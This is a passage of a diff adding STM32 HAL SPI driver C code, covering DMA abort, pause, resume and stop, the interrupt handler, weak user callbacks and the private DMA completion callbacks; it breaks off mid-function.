(hspi->hdmarx != NULL) + { + /* Set DMA Abort Complete callback if UART DMA Rx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_RXDMAEN)) + { + hspi->hdmarx->XferAbortCallback = SPI_DMARxAbortCallback; + } + else + { + hspi->hdmarx->XferAbortCallback = NULL; + } + } + + /* Disable the SPI DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_TXDMAEN)) + { + /* Abort the SPI DMA Tx Stream/Channel */ + if (hspi->hdmatx != NULL) + { + /* Abort DMA Tx Handle linked to SPI Peripheral */ + if (HAL_DMA_Abort_IT(hspi->hdmatx) != HAL_OK) + { + hspi->hdmatx->XferAbortCallback = NULL; + hspi->ErrorCode = HAL_SPI_ERROR_ABORT; + } + else + { + abortcplt = 0U; + } + } + } + /* Disable the SPI DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hspi->Instance->CR2, SPI_CR2_RXDMAEN)) + { + /* Abort the SPI DMA Rx Stream/Channel */ + if (hspi->hdmarx != NULL) + { + /* Abort DMA Rx Handle linked to SPI Peripheral */ + if (HAL_DMA_Abort_IT(hspi->hdmarx) != HAL_OK) + { + hspi->hdmarx->XferAbortCallback = NULL; + hspi->ErrorCode = HAL_SPI_ERROR_ABORT; + } + else + { + abortcplt = 0U; + } + } + } + + if (abortcplt == 1U) + { + /* Reset Tx and Rx transfer counters */ + hspi->RxXferCount = 0U; + hspi->TxXferCount = 0U; + + /* Check error during Abort procedure */ + if (hspi->ErrorCode == HAL_SPI_ERROR_ABORT) + { + /* return HAL_Error in case of error during Abort procedure */ + errorcode = HAL_ERROR; + } + else + { + /* Reset errorCode */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + } + + /* Clear the Error flags in the SR register */ + __HAL_SPI_CLEAR_OVRFLAG(hspi); + __HAL_SPI_CLEAR_FREFLAG(hspi); + + /* Restore hspi->State to Ready */ + hspi->State = HAL_SPI_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->AbortCpltCallback(hspi); +#else + HAL_SPI_AbortCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + + return errorcode; +} + +/** + * @brief Pause the DMA Transfer. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for the specified SPI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_DMAPause(SPI_HandleTypeDef *hspi) +{ + /* Process Locked */ + __HAL_LOCK(hspi); + + /* Disable the SPI DMA Tx & Rx requests */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN); + + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + + return HAL_OK; +} + +/** + * @brief Resume the DMA Transfer. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for the specified SPI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_DMAResume(SPI_HandleTypeDef *hspi) +{ + /* Process Locked */ + __HAL_LOCK(hspi); + + /* Enable the SPI DMA Tx & Rx requests */ + SET_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN); + + /* Process Unlocked */ + __HAL_UNLOCK(hspi); + + return HAL_OK; +} + +/** + * @brief Stop the DMA Transfer. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for the specified SPI module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SPI_DMAStop(SPI_HandleTypeDef *hspi) +{ + HAL_StatusTypeDef errorcode = HAL_OK; + /* The Lock is not implemented on this API to allow the user application + to call the HAL SPI API under callbacks HAL_SPI_TxCpltCallback() or HAL_SPI_RxCpltCallback() or HAL_SPI_TxRxCpltCallback(): + when calling HAL_DMA_Abort() API the DMA TX/RX Transfer complete interrupt is generated + and the correspond call back is executed HAL_SPI_TxCpltCallback() or HAL_SPI_RxCpltCallback() or HAL_SPI_TxRxCpltCallback() + */ + + /* Abort the SPI DMA tx Stream/Channel */ + if (hspi->hdmatx != NULL) + { + if (HAL_OK != HAL_DMA_Abort(hspi->hdmatx)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + errorcode = HAL_ERROR; + } + } + /* Abort the SPI DMA rx Stream/Channel */ + if (hspi->hdmarx != NULL) + { + if (HAL_OK != HAL_DMA_Abort(hspi->hdmarx)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + errorcode = HAL_ERROR; + } + } + + /* Disable the SPI DMA Tx & Rx requests */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN); + hspi->State = HAL_SPI_STATE_READY; + return errorcode; +} + +/** + * @brief Handle SPI interrupt request. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for the specified SPI module. + * @retval None + */ +void HAL_SPI_IRQHandler(SPI_HandleTypeDef *hspi) +{ + uint32_t itsource = hspi->Instance->CR2; + uint32_t itflag = hspi->Instance->SR; + + /* SPI in mode Receiver ----------------------------------------------------*/ + if ((SPI_CHECK_FLAG(itflag, SPI_FLAG_OVR) == RESET) && + (SPI_CHECK_FLAG(itflag, SPI_FLAG_RXNE) != RESET) && (SPI_CHECK_IT_SOURCE(itsource, SPI_IT_RXNE) != RESET)) + { + hspi->RxISR(hspi); + return; + } + + /* SPI in mode Transmitter -------------------------------------------------*/ + if ((SPI_CHECK_FLAG(itflag, SPI_FLAG_TXE) != RESET) && (SPI_CHECK_IT_SOURCE(itsource, SPI_IT_TXE) != RESET)) + { + hspi->TxISR(hspi); + return; + } + + /* SPI in Error Treatment --------------------------------------------------*/ + if (((SPI_CHECK_FLAG(itflag, SPI_FLAG_MODF) != RESET) || (SPI_CHECK_FLAG(itflag, SPI_FLAG_OVR) != RESET) + || (SPI_CHECK_FLAG(itflag, SPI_FLAG_FRE) != RESET)) && (SPI_CHECK_IT_SOURCE(itsource, SPI_IT_ERR) != RESET)) + { + /* SPI Overrun error interrupt occurred ----------------------------------*/ + if (SPI_CHECK_FLAG(itflag, SPI_FLAG_OVR) != RESET) + { + if (hspi->State != HAL_SPI_STATE_BUSY_TX) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_OVR); + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + else + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + return; + } + } + + /* SPI Mode Fault error interrupt occurred -------------------------------*/ + if (SPI_CHECK_FLAG(itflag, SPI_FLAG_MODF) != RESET) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_MODF); + __HAL_SPI_CLEAR_MODFFLAG(hspi); + } + + /* SPI Frame error interrupt occurred ------------------------------------*/ + if (SPI_CHECK_FLAG(itflag, SPI_FLAG_FRE) != RESET) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FRE); + __HAL_SPI_CLEAR_FREFLAG(hspi); + } + + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + /* Disable all interrupts */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_RXNE | SPI_IT_TXE | SPI_IT_ERR); + + hspi->State = HAL_SPI_STATE_READY; + /* Disable the SPI DMA requests if enabled */ + if ((HAL_IS_BIT_SET(itsource, SPI_CR2_TXDMAEN)) || (HAL_IS_BIT_SET(itsource, SPI_CR2_RXDMAEN))) + { + CLEAR_BIT(hspi->Instance->CR2, (SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN)); + + /* Abort the SPI DMA Rx channel */ + if (hspi->hdmarx != NULL) + { + /* Set the SPI DMA Abort callback : + will lead to call HAL_SPI_ErrorCallback() at end of DMA abort procedure */ + hspi->hdmarx->XferAbortCallback = SPI_DMAAbortOnError; + if (HAL_OK != HAL_DMA_Abort_IT(hspi->hdmarx)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + } + } + /* Abort the SPI DMA Tx channel */ + if (hspi->hdmatx != NULL) + { + /* Set the SPI DMA Abort callback : + will lead to call HAL_SPI_ErrorCallback() at end of DMA abort procedure */ + hspi->hdmatx->XferAbortCallback = SPI_DMAAbortOnError; + if (HAL_OK != HAL_DMA_Abort_IT(hspi->hdmatx)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + } + } + } + else + { + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + } + } + return; + } +} + +/** + * @brief Tx Transfer completed callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_TxCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_TxCpltCallback should be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_RxCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_RxCpltCallback should be implemented in the user file + */ +} + +/** + * @brief Tx and Rx Transfer completed callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_TxRxCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_TxRxCpltCallback should be implemented in the user file + */ +} + +/** + * @brief Tx Half Transfer completed callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_TxHalfCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_TxHalfCpltCallback should be implemented in the user file + */ +} + +/** + * @brief Rx Half Transfer completed callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_RxHalfCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_RxHalfCpltCallback() should be implemented in the user file + */ +} + +/** + * @brief Tx and Rx Half Transfer callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_TxRxHalfCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_TxRxHalfCpltCallback() should be implemented in the user file + */ +} + +/** + * @brief SPI error callback. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +__weak void HAL_SPI_ErrorCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_ErrorCallback should be implemented in the user file + */ + /* NOTE : The ErrorCode parameter in the hspi handle is updated by the SPI processes + and user can use HAL_SPI_GetError() API to check the latest error occurred + */ +} + +/** + * @brief SPI Abort Complete callback. + * @param hspi SPI handle. + * @retval None + */ +__weak void HAL_SPI_AbortCpltCallback(SPI_HandleTypeDef *hspi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hspi); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SPI_AbortCpltCallback can be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup SPI_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief SPI control functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the SPI. + (+) HAL_SPI_GetState() API can be helpful to check in run-time the state of the SPI peripheral + (+) HAL_SPI_GetError() check in run-time Errors occurring during communication +@endverbatim + * @{ + */ + +/** + * @brief Return the SPI handle state. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval SPI state + */ +HAL_SPI_StateTypeDef HAL_SPI_GetState(SPI_HandleTypeDef *hspi) +{ + /* Return SPI handle state */ + return hspi->State; +} + +/** + * @brief Return the SPI error code. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval SPI error code in bitmap format + */ +uint32_t HAL_SPI_GetError(SPI_HandleTypeDef *hspi) +{ + /* Return SPI ErrorCode */ + return hspi->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup SPI_Private_Functions + * @brief Private functions + * @{ + */ + +/** + * @brief DMA SPI transmit process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + uint32_t tickstart; + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + /* DMA Normal Mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) != DMA_SxCR_CIRC) + { + /* Disable ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_ERR); + + /* Disable Tx DMA Request */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN); + + /* Check the end of the transaction */ + if (SPI_EndRxTxTransaction(hspi, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + } + + /* Clear overrun flag in 2 Lines communication mode because received data is not read */ + if (hspi->Init.Direction == SPI_DIRECTION_2LINES) + { + __HAL_SPI_CLEAR_OVRFLAG(hspi); + } + + hspi->TxXferCount = 0U; + hspi->State = HAL_SPI_STATE_READY; + + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + return; + } + } + /* Call user Tx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->TxCpltCallback(hspi); +#else + HAL_SPI_TxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI receive process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + uint32_t tickstart; +#if (USE_SPI_CRC != 0U) + __IO uint32_t tmpreg = 0U; +#endif /* USE_SPI_CRC */ + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + /* DMA Normal Mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) != DMA_SxCR_CIRC) + { + /* Disable ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_ERR); + +#if (USE_SPI_CRC != 0U) + /* CRC handling */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Wait until RXNE flag */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, SET, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + /* Error on the CRC reception */ + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + } + /* Read CRC */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + } +#endif /* USE_SPI_CRC */ + + /* Check if we are in Master RX 2 line mode */ + if ((hspi->Init.Direction == SPI_DIRECTION_2LINES) && (hspi->Init.Mode == SPI_MODE_MASTER)) + { + /* Disable Rx/Tx DMA Request (done by default to handle the case master rx direction 2 lines) */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN); + } + else + { + /* Normal case */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_RXDMAEN); + } + + /* Check the end of the transaction */ + if (SPI_EndRxTransaction(hspi, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + hspi->ErrorCode = HAL_SPI_ERROR_FLAG; + } + + hspi->RxXferCount = 0U; + hspi->State = HAL_SPI_STATE_READY; + +#if (USE_SPI_CRC != 0U) + /* Check if CRC error occurred */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_CRCERR)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + __HAL_SPI_CLEAR_CRCERRFLAG(hspi); + } +#endif /* USE_SPI_CRC */ + + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + return; + } + } + /* Call user Rx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->RxCpltCallback(hspi); +#else + HAL_SPI_RxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI transmit receive process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMATransmitReceiveCplt(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + uint32_t tickstart; +#if (USE_SPI_CRC != 0U) + __IO uint32_t tmpreg = 0U; +#endif /* USE_SPI_CRC */ + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + /* DMA Normal Mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) != DMA_SxCR_CIRC) + { + /* Disable ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, SPI_IT_ERR); + +#if (USE_SPI_CRC != 0U) + /* CRC handling */ + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + /* Wait the CRC data */ + if (SPI_WaitFlagStateUntilTimeout(hspi, SPI_FLAG_RXNE, SET, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + } + /* Read CRC to Flush DR and RXNE flag */ + tmpreg = READ_REG(hspi->Instance->DR); + /* To avoid GCC warning */ + UNUSED(tmpreg); + } +#endif /* USE_SPI_CRC */ + + /* Check the end of the transaction */ + if (SPI_EndRxTxTransaction(hspi, SPI_DEFAULT_TIMEOUT, tickstart) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_FLAG); + } + + /* Disable Rx/Tx DMA Request */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN); + + hspi->TxXferCount = 0U; + hspi->RxXferCount = 0U; + hspi->State = HAL_SPI_STATE_READY; + +#if (USE_SPI_CRC != 0U) + /* Check if CRC error occurred */ + if (__HAL_SPI_GET_FLAG(hspi, SPI_FLAG_CRCERR)) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_CRC); + __HAL_SPI_CLEAR_CRCERRFLAG(hspi); + } +#endif /* USE_SPI_CRC */ + + if (hspi->ErrorCode != HAL_SPI_ERROR_NONE) + { + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ + return; + } + } + /* Call user TxRx complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->TxRxCpltCallback(hspi); +#else + HAL_SPI_TxRxCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI half transmit process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMAHalfTransmitCplt(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + + /* Call user Tx half complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->TxHalfCpltCallback(hspi); +#else + HAL_SPI_TxHalfCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI half receive process complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMAHalfReceiveCplt(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + + /* Call user Rx half complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->RxHalfCpltCallback(hspi); +#else + HAL_SPI_RxHalfCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI half transmit receive process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMAHalfTransmitReceiveCplt(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + + /* Call user TxRx half complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->TxRxHalfCpltCallback(hspi); +#else + HAL_SPI_TxRxHalfCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI communication error callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SPI_DMAError(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + + /* Stop the disable DMA transfer on SPI side */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN | SPI_CR2_RXDMAEN); + + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_DMA); + hspi->State = HAL_SPI_STATE_READY; + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI communication abort callback, when initiated by HAL services on Error + * (To be called at end of DMA Abort procedure following error occurrence). + * @param hdma DMA handle. + * @retval None + */ +static void SPI_DMAAbortOnError(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + hspi->RxXferCount = 0U; + hspi->TxXferCount = 0U; + + /* Call user error callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->ErrorCallback(hspi); +#else + HAL_SPI_ErrorCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI Tx communication abort callback, when initiated by user + * (To be called at end of DMA Tx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Rx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void SPI_DMATxAbortCallback(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + __IO uint32_t count; + + hspi->hdmatx->XferAbortCallback = NULL; + count = SPI_DEFAULT_TIMEOUT * (SystemCoreClock / 24U / 1000U); + + /* Disable Tx DMA Request */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_TXDMAEN); + + /* Wait until TXE flag is set */ + do + { + if (count == 0U) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + break; + } + count--; + } while ((hspi->Instance->SR & SPI_FLAG_TXE) == RESET); + + /* Check if an Abort process is still ongoing */ + if (hspi->hdmarx != NULL) + { + if (hspi->hdmarx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA Stream/Channel are aborted, call user Abort Complete callback */ + hspi->RxXferCount = 0U; + hspi->TxXferCount = 0U; + + /* Check no error during Abort procedure */ + if (hspi->ErrorCode != HAL_SPI_ERROR_ABORT) + { + /* Reset errorCode */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + } + + /* Clear the Error flags in the SR register */ + __HAL_SPI_CLEAR_OVRFLAG(hspi); + __HAL_SPI_CLEAR_FREFLAG(hspi); + + /* Restore hspi->State to Ready */ + hspi->State = HAL_SPI_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->AbortCpltCallback(hspi); +#else + HAL_SPI_AbortCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SPI Rx communication abort callback, when initiated by user + * (To be called at end of DMA Rx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Tx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void SPI_DMARxAbortCallback(DMA_HandleTypeDef *hdma) +{ + SPI_HandleTypeDef *hspi = (SPI_HandleTypeDef *)(((DMA_HandleTypeDef *)hdma)->Parent); /* Derogation MISRAC2012-Rule-11.5 */ + + /* Disable SPI Peripheral */ + __HAL_SPI_DISABLE(hspi); + + hspi->hdmarx->XferAbortCallback = NULL; + + /* Disable Rx DMA Request */ + CLEAR_BIT(hspi->Instance->CR2, SPI_CR2_RXDMAEN); + + /* Check Busy flag */ + if (SPI_EndRxTxTransaction(hspi, SPI_DEFAULT_TIMEOUT, HAL_GetTick()) != HAL_OK) + { + SET_BIT(hspi->ErrorCode, HAL_SPI_ERROR_ABORT); + } + + /* Check if an Abort process is still ongoing */ + if (hspi->hdmatx != NULL) + { + if (hspi->hdmatx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA Stream/Channel are aborted, call user Abort Complete callback */ + hspi->RxXferCount = 0U; + hspi->TxXferCount = 0U; + + /* Check no error during Abort procedure */ + if (hspi->ErrorCode != HAL_SPI_ERROR_ABORT) + { + /* Reset errorCode */ + hspi->ErrorCode = HAL_SPI_ERROR_NONE; + } + + /* Clear the Error flags in the SR register */ + __HAL_SPI_CLEAR_OVRFLAG(hspi); + __HAL_SPI_CLEAR_FREFLAG(hspi); + + /* Restore hspi->State to Ready */ + hspi->State = HAL_SPI_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_SPI_REGISTER_CALLBACKS == 1U) + hspi->AbortCpltCallback(hspi); +#else + HAL_SPI_AbortCpltCallback(hspi); +#endif /* USE_HAL_SPI_REGISTER_CALLBACKS */ +} + +/** + * @brief Rx 8-bit handler for Transmit and Receive in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_2linesRxISR_8BIT(struct __SPI_HandleTypeDef *hspi) +{ + /* Receive data in 8bit mode */ + *hspi->pRxBuffPtr = *((__IO uint8_t *)&hspi->Instance->DR); + hspi->pRxBuffPtr++; + hspi->RxXferCount--; + + /* Check end of the reception */ + if (hspi->RxXferCount == 0U) + { +#if (USE_SPI_CRC != 0U) + if (hspi->Init.CRCCalculation == SPI_CRCCALCULATION_ENABLE) + { + hspi->RxISR = SPI_2linesRxISR_8BITCRC; + return; + } +#endif /* USE_SPI_CRC */ + + /* Disable RXNE and ERR interrupt */ + __HAL_SPI_DISABLE_IT(hspi, (SPI_IT_RXNE | SPI_IT_ERR)); + + if (hspi->TxXferCount == 0U) + { + SPI_CloseRxTx_ISR(hspi); + } + } +} + +#if (USE_SPI_CRC != 0U) +/** + * @brief Rx 8-bit handler for Transmit and Receive in Interrupt mode. + * @param hspi pointer to a SPI_HandleTypeDef structure that contains + * the configuration information for SPI module. + * @retval None + */ +static void SPI_2linesRxISR_8BITCRC(struct __SPI_HandleTypeDef *hspi) +{ + __IO uint8_t * ptmpreg8; + __IO uint8_t tmpreg8 = 0; + + /* Initialize the 8bit temporary pointer */ + ptmpreg8 = (__IO uint8_t *)&hspi->Instance->DR; + /* Read 8bit CRC to flush Data Register */ + tmpreg8 = 